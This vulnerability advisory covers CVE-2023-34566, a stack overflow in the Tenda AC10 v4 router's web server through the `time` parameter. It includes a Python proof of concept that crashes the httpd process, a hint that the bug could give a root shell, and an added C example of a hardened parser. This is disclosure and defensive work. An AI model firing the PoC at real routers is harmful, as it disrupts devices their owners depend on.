CVE-2023-34566: Tenda AC10 v4 stack overflow via parameter time at /goform/saveParentControlInfo

Tenda AC10 v4 US_AC10V4.0si_V16.03.10.13_cn was discovered to contain a stack overflow via parameter time at /goform/saveParentControlInfo.


# Tenda AC10 v4 stack overflow via parameter time at url /goform/saveParentControlInfo

###### tags: `Tenda` `AC10 v4`

vendor: Tenda
product: AC10 v4
version: US_AC10V4.0si_V16.03.10.13_cn
type: Stack Overflow
author: Yifeng Li, Wolin Zhuang, Shencai Zhu

## Vulnerability Description

Tenda AC10 v4 US_AC10V4.0si_V16.03.10.13_cn was discovered to contain a stack overflow via the parameter `time` at url /goform/saveParentControlInfo.

## Vulnerability Details

In function `saveParentControlInfo`, line 23, the program proceeds into function `compare_parentcontrol_time`.

![](https://hackmd.io/_uploads/HJvL1eGS2.png)

In function `compare_parentcontrol_time`, `v3` and `v4` are local variables.

![](https://hackmd.io/_uploads/r1_vJeGB2.png)

The content obtained from the parameter `time` is passed into `s` without a length check. Then, in line 27, the strings in `s` are formatted into `v4` and `v3`, which leads to a stack overflow vulnerability.

## Reproducing the vulnerability and PoC

To reproduce the vulnerability, follow these steps:

1. Upgrade the AC10 v4 router to the newest version.
2. Run the PoC script.

![](https://hackmd.io/_uploads/B17y8gMS2.png)

```
import requests

# Oversized value for the `time` parameter
exp = b'a'*100
url = "http://192.168.0.1/goform/saveParentControlInfo?time=%s" % exp

payload = {}
headers = {}

response = requests.request("GET", url, headers=headers, data=payload)
print(response.text)
```

Run poc.py and you will see the httpd process crash with a segmentation fault.

![](https://hackmd.io/_uploads/H1_kEz5S3.png)

You can also write your own exploit to get a root shell.
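The missing length check described under Vulnerability Details is the root cause, so the fix is to bound both the input and each conversion. The following is an added example, not the firmware's code and not part of the original write-up; the `HH:MM-HH:MM` layout of `time`, the 8-byte buffers and all function names are assumptions made for illustration.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define FIELD_MAX 8 /* assumed size of each stack buffer, NUL included */

/* Strict "HH:MM" to minutes since midnight, or -1 if malformed. */
static int hhmm(const char *t)
{
    if (strlen(t) != 5 || t[2] != ':')
        return -1;
    for (int i = 0; i < 5; i++)
        if (i != 2 && !isdigit((unsigned char)t[i]))
            return -1;
    int h = (t[0] - '0') * 10 + (t[1] - '0');
    int m = (t[3] - '0') * 10 + (t[4] - '0');
    return (h < 24 && m < 60) ? h * 60 + m : -1;
}

/* Hardened parse of an attacker-controlled `time` value (hypothetical name).
 * An unbounded form such as sscanf(s, "%[^-]-%s", start, end) has no width
 * on either conversion, so a long value writes past both stack buffers.
 * Returns 0 and fills both outputs, or -1 on any reject. */
int parse_time_bounded(const char *s, int *start_min, int *end_min)
{
    char start[FIELD_MAX], end[FIELD_MAX];
    int used = 0;

    /* 1. Reject oversized input before anything is copied. */
    if (s == NULL || strlen(s) > 2 * (FIELD_MAX - 1) + 1)
        return -1;
    /* 2. Widths are FIELD_MAX - 1, so neither buffer can be overrun;
     *    %n plus the NUL check rejects trailing bytes. */
    if (sscanf(s, "%7[^-]-%7s%n", start, end, &used) != 2 || s[used] != '\0')
        return -1;
    /* 3. Validate the content, not only the length. */
    *start_min = hhmm(start);
    *end_min = hhmm(end);
    return (*start_min >= 0 && *end_min >= 0) ? 0 : -1;
}

int main(void)
{
    int a = 0, b = 0;
    int rc = parse_time_bounded("08:00-21:30", &a, &b); /* constructed input */
    printf("rc=%d start=%d end=%d\n", rc, a, b);
    return 0;
}
```

The conversion widths must be updated together with `FIELD_MAX`, since `sscanf` takes them as literals in the format string.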
